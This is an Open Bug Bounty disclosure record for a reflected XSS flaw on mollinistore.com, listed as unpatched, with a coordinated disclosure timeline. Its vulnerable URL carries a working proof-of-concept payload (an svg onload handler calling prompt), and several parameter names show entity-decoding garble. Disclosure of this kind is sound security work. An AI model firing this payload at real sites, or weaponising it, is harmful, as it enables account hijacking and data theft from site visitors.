mollinistore.com XSS vulnerability

2017-09-08T12:12:00
ID OBB:291150
Type openbugbounty
Reporter M0r3h4x
Modified 2017-12-07T13:38:00

Description

Vulnerable URL:
http://mollinistore.com/catalog/view/theme/_ajax_view-product.php?product_href=http%3A%2F%2Fmollinistore.com%2Fmollini%2Fzyrandol-olivia-dream-black%3Fpage%3D2&view;_details=View+detailsℑ_main=xss%22%3E%3Csvg/onload=prompt(/openbugbounty/)%3E&product;_name=OLIVIA+DREAM+BLACK&product;_price=2%2C490.00PLN&product;_special=1%2C743.00PLN&product;_rating=0&product;_description_short=8+arms+chandelier+called+Olivia+Dream+made+of+best+quality+blown+glass+is+a+classic+of+style.+It+att..&product;_tax=&text;_tax=Ex+Tax%3A&stock;=6&share;_f=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Fwww.facebook.com%2F%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-facebook12%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B&share;_t=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Ftwitter.com%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-twitter20%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B&share;_g=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Fwww.google.com%2F%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-google10%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B&share;_pin=%26lt%3Ba+href%3D%26quot%3Bhttps%3A%2F%2Fwww.pinterest.com%2F%26quot%3B%26gt%3B%26lt%3Bspan+class%3D%26quot%3Bicon+flaticon-pinterest9%26quot%3B%26gt%3B%26lt%3B%2Fspan%26gt%3B%26lt%3B%2Fa%26gt%3B
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 07.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 8154187
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 September, 2017 12:12 GMT
Generic security notifications sent to website owner| 8 September, 2017 12:15 GMT
Notification sent to subscribers (without technical details)| 8 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 7 December, 2017 13:38 GMT